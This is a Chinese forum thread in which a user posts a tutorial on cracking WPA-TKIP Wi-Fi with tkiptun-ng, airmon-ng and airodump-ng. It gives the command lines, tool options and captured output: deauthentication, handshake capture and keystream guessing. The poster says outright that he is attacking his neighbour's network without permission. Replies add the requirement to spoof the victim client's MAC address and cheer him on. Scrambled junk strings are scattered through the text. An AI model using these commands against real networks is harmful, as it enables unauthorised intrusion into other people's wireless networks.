ubnt解决方案
查看: 43533|回复: 86

[原创] tkiptun-ng攻击方法(我已经更新了请看下面)

[复制链接]

80

回帖

590

积分

67 小时

在线时间

中尉

注册时间
2009-1-20
金币
267 个
威望
24 个
荣誉
7 个

尚未签到

发表于 2009-2-27 07:55 |显示全部楼层
本帖最后由 ji8635382 于 2009-3-3 17:59 编辑 " z8 e7 L" J( Y9 r8 L3 p0 R

$ L5 T; D4 p2 L" v, O9 M5 ]ErikTews将在东京的PacSec大会上,演示他是如何在15分钟内破解WPA加密技术的。之前的无线加密技术WEP只需使用当今的笔记本即可在几分钟内破解。EricTews将演示他是如何破解WPA加密技术来读取从路由器传往笔记本的数据。为了读取正在传送的数据,Tews找到了无需用字典攻击法,来破解临时密钥完整性协议(TKIP)的方法。
' @' \5 p9 Z- L% U& A5 }8 k下面就是进行破解的步骤 我参考国外的论坛写的!
% |4 g, |4 \' n3 ?首先要具备3点必备的攻击条件2 p! n6 O7 Q* K/ p: K% F/ X5 g% T
1 客户端和接入点必须使用WPA TKIP 而且客户端必须连接
9 Q; X6 K2 J. f7 W9 q; g: J9 S2 客户端和接入点必须使用的网络协议地址的IPv44 B1 k$ g2 J% N4 R5 H7 C6 K2 ^
3一个长期存在的时间延长键(重新输入间隔)必须设定的接入点。在大多数调制解调器/无线路由器使用TKIP ,这一时期是默认情况下设置为3600秒,从而使攻击- E! z. P1 v$ m! |/ Y
以上3点基本上是没有问题了下面是就是攻击了% o/ |) C4 M6 h( \, p( |
airmon-ng a 首先把网卡监视模式打开:输入airmon-ng start wlan0 注意我的网卡端口是wlan0不同的网卡端口都不一样可以用ifconfig -a 进行查看# `' E( k0 [6 c8 s- H% l9 v3 z
输入后出现的内如如下( ^; [  v! b+ i0 F! F+ ^
PID     Name
2 }+ J3 R8 n0 \3 v2954    dhcpcd$ m' R# C, _" c" F# }
- q5 a5 L+ K8 \/ N: c& _2 U
8 t4 t2 a0 C5 x9 N
Interface       Chipset         Driver
7 m# T# D( h# l
& G. K5 m3 M5 [" U4 p4 _2 fwlan0           RTL8187         r8187 (monitor mode enabled)
, {, d0 S# V. S1 t: a& l5 \( Z0 }不需要另外安装tkiptun-ng bt3正式版有自带的$ ^2 D4 T7 h% v0 B  `0 ]
2楼有最新的aircrack工具里面有带tkiptun-ng工具5 a! B7 B: @4 T6 W$ F
介绍下tkiptun-ng工具1 L) `9 C+ ]: I" x! G) @0 f. l
" e, Y! @1 X6 h
Filter options:过滤器的!
& u5 M; }$ J+ Y) w$ P9 C: e; ^) u- J5 i  r# l( {- ^
      -d dmac   : MAC address, Destination
2 H# q- Y0 O) h  f. ^/ s' G      -s smac   : MAC address, Source
2 }+ c2 e5 ?: P/ s- }) y" J: k      -m len    : minimum packet length
1 H$ x1 c, P, x      -n len    : maximum packet length
& W. Y% N: A. t0 ~      -t tods   : frame control, To      DS bit
. B" H' X! v+ n      -f fromds : frame control, From    DS bit$ T9 r5 M( f; e: r0 {. y
      -D        : disable AP detection
5 x5 f, M1 p2 D; d8 P6 n4 }" c8 H! M9 i" a: B
  Replay options:攻击的!' A) M# C7 u8 Q- [- m) {$ @: T

6 ^- K0 }" A. V3 w; s. \      -x nbpps  : number of packets per second4 ?9 ~! P+ ~  H" ~8 f
      -a bssid  : set Access Point MAC address
3 G( j" i- h' B% r: N; F$ J& @      -c dmac   : set Destination  MAC address
7 q1 Y, n+ `; ?7 M" q" p      -h smac   : set Source       MAC address
! ?/ j6 M4 Z) c8 o6 k% x      -F        : choose first matching packet* t: m4 c, z$ y: G- j
      -e essid  : set target AP SSID
/ ?3 \8 R: q( E2 E2 h0 i
; v4 L( Q( h2 N' M- P' n  Debug options:调试的!
. m  M2 k, \6 w* p- R) R      -K prga   : keystream for continuation/ @: Z; P4 k3 c) g2 P& C: I2 c
      -y file   : keystream-file for continuation
! e6 `! r& D* o4 E0 S1 O: n) c      -j        : inject FromDS packets  H5 e& q1 |1 @8 |3 i: X6 q
      -P pmk    : pmk for verification/vuln testing/ P7 @) f4 @, e' ?
      -p psk    : psk to calculate pmk with essid
# P- F7 r' ^- E( g& n3 @4 b, e
: m/ r9 B/ O6 f$ P* h9 ^  source options:  这个不太清楚 。:)呵呵
, D8 }% G" p1 Y1 o; f5 P
$ k  s5 P* Z9 B; q# z      -i iface  : capture packets from this interface9 L3 `  f& Q/ z0 L/ l- ]
      -r file   : extract packets from this pcap file7 ~+ C4 j' x2 U

. S% x+ R& K- \      --help              : Displays this usage screen( A% t# i2 Y+ q9 u$ x  [! B* z* [

" J2 D0 O9 I( z9 h这个使用 airodump-ng -w 1 wlan0 这个就不解释了
$ R' h0 ?8 r; x! d* D" l; e0 T0 F' O8 V  m" ^1 }
我看下图1有一个essid为linksys的ap底下也有正常的客服端 这个我在上面注意已经强调了必需要有。* r4 ~' @; m" i5 v: x
然后我们在打开一个 shell 下面开始tkiptun-ng的命令- e; O( G( m& [& R1 w! a0 E
tkiptun-ng wlan0 -a 00:0C:413:12:81 -h 00:12:F0:6F:ED:38 wlan0 是我的端口 -a 是我们要工具的ap mac地址 使用airodump-ng工具时可以看到 -h 是我们自己的 mac地址用 ifconfig -a 可以查到 记入监视模式要忽略掉后面的0 接着我们可以看到图2的内容我们可以看到图上写着 注入成功 等待信号 拿到握手包 等等的内容
9 C8 U9 Y" b; B: O/ P最后就等待ARP协议数据包的收集了
7 {: o! B( M. Q& n! F
9 ?; z) Y, h+ g) p以上就是攻击的方式了
$ o3 O0 O. e$ g5 m! z  Q5 o: c9 W' ^/ d1 V: I# M( i; b
( `/ u6 E! c* \
呵呵我也不知道出了问题还是我遗漏了什么或者可能是我的配置是问题,tkiptun-ng攻击一直在等待数据包气死我了 但是看老外也有成功注入的人希望你们也可以成功    tkiptun-ng还是测试版 我想正式版出来应该可以解决很多问题的! 希望大家对tkiptun-ng能多点关注 wpa的破解是有明天的 哈哈哈哈哈哈哈!!!!!!!!
2 h( E# |. S# z8 ]1 Q) J% f0 @) I) P7 ^0 S# V7 B( w( v

! C: r/ x: G& |$ x7 s2 l
: Q, w3 j6 P3 n$ h8 T; f# |$ s' q% C" V* x7 l* I0 \
! y7 ]& {) j3 U; T( O/ E6 I

8 O0 A1 n0 G) A: c( A$ W! @. g, K
/ H& t+ c! Y" s/ t% X

5 ?& ]: ?$ P9 s  @7 H- F$ ]+ U9 [- M* X' V/ `( _+ H& n

( H! F3 j* |' R. {1 I
( D# g& O( E# G3 D% [# H7 b9 n3 B2 s4 ~5 X, i5 Q, O9 E- e: X
) H3 A0 S1 K6 e& d: |

0 N; e- i  `: f2 s+ u  ?  }6 \2 D) s) D# h% H: |# M

9 k0 f$ n8 S$ c9 M
( i$ p% ?; g6 `. @4 ?
9 j6 z" d9 y+ H  j  z3 H% G0 p6 a% s$ U' `9 p0 r9 t6 i5 K/ X$ s7 {( k4 ]

( L7 p# B8 R. }+ c: `! u$ W :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory:   n! h& u: j: E7 _

) W& n& [0 \! W2 W2 Y) h" o底下是新写的哦! 本教程只作参考任何法律责任我一概不负责。
: S( L2 }% _+ [4 o
0 r+ D/ v* X. o5 b5 v2楼有最新的aircrack工具里面有带tkiptun-ng工具- K; r2 s1 X. g* J

; p1 R9 J' _# j0 ~* M" m忙了一上午回家 还是习惯把bt3打开看看回顾上次做的东西 突然有想到了tkiptun-ng因为用airolib-ng做hash表实在耗时间还有就是我邻居他设的wpa2密码实在厉害我已经给他搞的心力交瘁了,可是我有不想放弃比较我在这密码上耗的时间太多了。好了进入正题
$ I" U5 R& d) O  T
, Y' K+ N- G, k+ m" t  T打开shell输入airodump-ng -w vicino ath1 这个不解释了看不懂我也没有办法。
: {" q1 |1 R; f( E' O监视你要破解的wpa-TKIP密码类型的ap记住必需要有客服端的
2 d* w# D+ O* e0 W关于底下那朋友说的需要更改mac 其实是不需要的 你输入底下的命令后软件自动更改mac6 D3 L/ U2 O: B. t# F! ^
1 tkiptun-ng -h 00:12:F0:6F:ED:38 -a 00:0C:413:12:81-m 80 -n 100 ath1 我用atheros网卡了所以显示ath1监视端口和上面的不一样,因为这次不是用我的华硕本本 今天用hp的!呵呵! -m 是最小数据包长度 -n 是最大数据包长度 我 80 和100比较稳定其他都效果不佳 这个是真对我ath网卡的其他的自己试试。 -h 写客服端的mac
* x6 r5 b  O. W!输入命令后出后会出现下面结果 图我没有办法给你们看了因为那太电脑还在破解中我是用另外的电脑写的希望你们理解!
' t" t" j) Q& x$ H$ J  XBlub 2:38 E6 38 1C 24 15 1C CF
& N1 s, t, n  d* z0 kBlub 1:17 DD 0D 69 1D C3 1F EE
/ M) o8 a( d* eBlub 3:29 31 79 E7 E6 CF 8D 5E    如果一直停留在 等待ARP协议数据包 就重新开始因为一直等就没有用的!, t* Y2 ]  t0 Y# F; |: m/ o
14:48:00  Michael Test: Successful(这个意思是测试成功)   看清楚上面的 blub 1 2 3这个是固定的显示一定要和我写的一样才可以成功        这个工具的握手包没法靠攻击得到大家请慢慢的等 自己用aireplay工具的是无用的我已经式过了。
& c, q0 M# h& r0 C. E14:48:00  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 1
2 U: {8 q& R# P( X" M! U8 [14:48:00  Found specified AP
+ L, `# ]; ~& \  w) \1 E14:48:00  Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 2| 4 ACKs]2 F1 k3 [$ _, J2 Y3 Q$ S2 ]  G
14:48:02  WPA handshake: 00:0C:413:12:81 captured7 |+ T- X0 N/ l1 I3 ]! z' a: b
14:48:02  Waiting for an ARP packet coming from the Client...
9 i3 f9 B( A# x  MSaving chosen packet in replay_src-1109-144822.cap5 t7 Q7 t* }' G& B& T. `9 f# T
14:48:22  Waiting for an ARP response packet coming from the AP...
0 o. F; j2 L! q4 Z7 z9 R3 ?Saving chosen packet in replay_src-1109-144822.cap
6 C  j/ [1 `) D2 c+ _- i! w! D+ \14:48:22  Got the answer!- h+ a6 \# P, J5 f; b& W
14:48:22  Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.7 F+ H- D2 _; v. r4 F% b* f

% p# {) X9 ~. R; v0 \4 GSent  80 packets, current guess: 37..  看到了吗?和上面的不一样哦!呵呵 现在开始猜密码了,你们有没有注意它写什么发包猜测 也就是说这软件是攻击ap在获取wpa的密码信息 这那我想到破解wep了!呵呵 现在猜了37次了 密码还没出现看来我邻居的密码真的很复杂啊!  1 `( }4 |/ D: n7 @/ {6 e# L3 U
/ [( w4 i( b" s
hirte成员还没有公布正式的方法这些都是乱搞的!在东京大会上是15钟破解而我现在都用了1个小时还没有密码 现在只能等待正式版  6 F' d; r6 R& m
    我现在电脑已经猜了58次 还没有出现密码   大家保佑我,如果出现密码会和大家说的 还有一个要注意客服端必需一直在线不然就无法用它攻击了。哎!!~~~~

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x

评分

1

查看全部评分

5780

回帖

3万

积分

1406 小时

在线时间

管理员

超级管理员

推广先锋正义勋章灌水天才

注册时间
2007-2-23
金币
24561 个
威望
53 个
荣誉
6 个
累计签到:476 天
连续签到:0 天
[LV.730]常住居民
发表于 2009-2-27 08:21 |显示全部楼层
http://www.aircrack-ng.orG,这个站被屏蔽了.要用代理才能上了.
回复

使用道具 举报

80

回帖

590

积分

67 小时

在线时间

中尉

注册时间
2009-1-20
金币
267 个
威望
24 个
荣誉
7 个

尚未签到

发表于 2009-2-27 08:36 |显示全部楼层
本帖最后由 ji8635382 于 2009-3-5 08:56 编辑 - v7 \- f. I, j8 m/ A9 \% b4 x

' ~$ y9 s: U; w1 J我已经做成lzm文件了放进 bt3\modules里面就可以了0 W2 W, |% m9 f, F# |# V3 v& s$ q+ `
: E) |3 p8 l/ ^* b- p: L

6 P8 M2 P1 Q1 V) U9 P. E) {0 b' V  U6 ]% x0 b
23楼的 要等待2个相同的握手包才可以! 我弄了4个握手包才可以继续。 其实可以用别的电脑攻击对方客服端!我就是这样做的 一台电脑进行攻击,另一台电脑收集ARP数据包。 我的密码没有破解出来 软件猜测190后 回复无法发送数据表。哎~~~
+ W# q4 o' P) |还是等待正式版的吧! 听说也快了。 具体时间无从得知。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x
回复

使用道具 举报

101

回帖

452

积分

129 小时

在线时间

少尉

注册时间
2008-11-3
金币
332 个
威望
1 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-2-27 10:19 |显示全部楼层
期待中........
回复

使用道具 举报

194

回帖

2035

积分

56 小时

在线时间

少校

注册时间
2009-2-13
金币
1756 个
威望
12 个
荣誉
0 个

尚未签到

发表于 2009-2-27 10:50 |显示全部楼层
好啊!!!!!!!!
回复

使用道具 举报

83

回帖

207

积分

79 小时

在线时间

少尉

注册时间
2008-9-17
金币
113 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-27 12:21 |显示全部楼层
:)好啊!!!!!!!!
回复

使用道具 举报

18

回帖

65

积分

21 小时

在线时间

上等兵

注册时间
2009-2-19
金币
42 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-27 13:19 |显示全部楼层
========================================================
% N5 ]* B: Y8 t, n0 dGeneral Requirements
8 ~6 y9 t+ l! g4 [) HBoth the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs.
& y. ^) X$ L; N0 _3 ~" B7 e, R% u9 _/ N6 V! v! z
The AP must be configured for WPA plus TKIP. & U- e8 Y8 {& Q! S) C2 b8 l0 B; \' u+ v
# l' Z- a. S! i7 _4 |% w$ i! J, H
A fairly long rekeying time must be in use such as 3600 seconds. It should be at least 20 minutes.
! E' p4 [" c1 W7 X9 C; n' F; ~+ O7 P$ @( u7 k; `% C! c
Specific Requirements
, t$ S) y" B7 ]* W7 w# q# M+ N- Y$ oThe network card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking.
5 ~. d" F/ m1 w+ F% {==================================================& q+ o8 c  d; G$ ^& l' F
! T8 Q0 ]8 B( L6 Y7 \1 {
以上是官方网站上的最新解释,楼主似乎没有将自己的网卡MAC Fake 成和合法客户的一样
回复

使用道具 举报

86

回帖

747

积分

106 小时

在线时间

中尉

注册时间
2007-1-11
金币
643 个
威望
1 个
荣誉
0 个
累计签到:18 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-2-27 15:05 |显示全部楼层
有点实际的了
回复

使用道具 举报

76

回帖

230

积分

46 小时

在线时间

少尉

注册时间
2008-9-13
金币
133 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-27 17:04 |显示全部楼层
大家给个能上这个网站的代理吧,thanks
回复

使用道具 举报

80

回帖

590

积分

67 小时

在线时间

中尉

注册时间
2009-1-20
金币
267 个
威望
24 个
荣誉
7 个

尚未签到

发表于 2009-2-28 21:10 |显示全部楼层
本帖最后由 ji8635382 于 2009-2-28 21:29 编辑 $ G8 I8 \9 f& Q2 _- E) B+ r
========================================================
% s9 V- v  F! q, D$ TGeneral Requirements
6 @. x  M, G& B- n  t8 @* i7 p7 FBoth the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs. + W+ k  V( N$ n8 I: {) O6 L5 V) t
9 w: J# {- ?! l$ p3 o% p
The AP must be  ...  c  Q( L6 U# }0 p
daibi 发表于 2009-2-27 13:19
7 E% ], [0 e9 b2 D: }3 m- f' V% d

4 G/ i- y" G! V' t' q) i7 SSpecific Requirements
  _. i: E! Y4 _4 \6 y
3 A0 d. q, ~* U7 y6 T1 X! e/ T7 Q2 Nnetwork card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking
9 |8 K& B& E' w7 e关于这个特殊要求我还真的没有看到,因为官方保密了许多内容 如破解过程等等都保密了。 楼上的谢谢你了 我现在试试看! 不要字典 不要字典~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~祈祷!!
回复

使用道具 举报

704

回帖

3121

积分

368 小时

在线时间

少校

注册时间
2006-11-1
金币
2158 个
威望
20 个
荣誉
5 个

尚未签到

发表于 2009-2-28 21:17 |显示全部楼层
这东西不顶对不住楼主,严重关注中
回复

使用道具 举报

730

回帖

8643

积分

676 小时

在线时间

中校

注册时间
2009-1-30
金币
7724 个
威望
6 个
荣誉
6 个
累计签到:673 天
连续签到:0 天
[LV.730]常住居民
发表于 2009-2-28 22:21 |显示全部楼层
快了,快了,快了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2026-8-2 11:23

返回顶部 返回列表